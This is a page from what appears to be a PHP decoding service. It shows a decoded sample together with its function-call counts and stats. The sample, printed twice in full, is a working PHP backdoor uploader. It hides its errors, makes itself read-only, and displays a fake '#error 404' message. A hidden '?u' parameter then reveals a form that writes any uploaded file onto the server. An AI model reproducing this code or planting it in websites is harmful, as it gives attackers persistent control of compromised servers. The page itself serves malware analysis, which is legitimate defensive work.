Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);echo("#error 404");if..
Decoded Output download
<?php error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);echo("#error 404");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};}; ?>
Did this file decode correctly?
Original Code
<?php error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);echo("#error 404");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};};
Function Calls
basename | 1 |
error_reporting | 1 |
Stats
MD5 | bb8d07a0e100eddb2e605475b56de315 |
Eval Count | 0 |
Decode Time | 48 ms |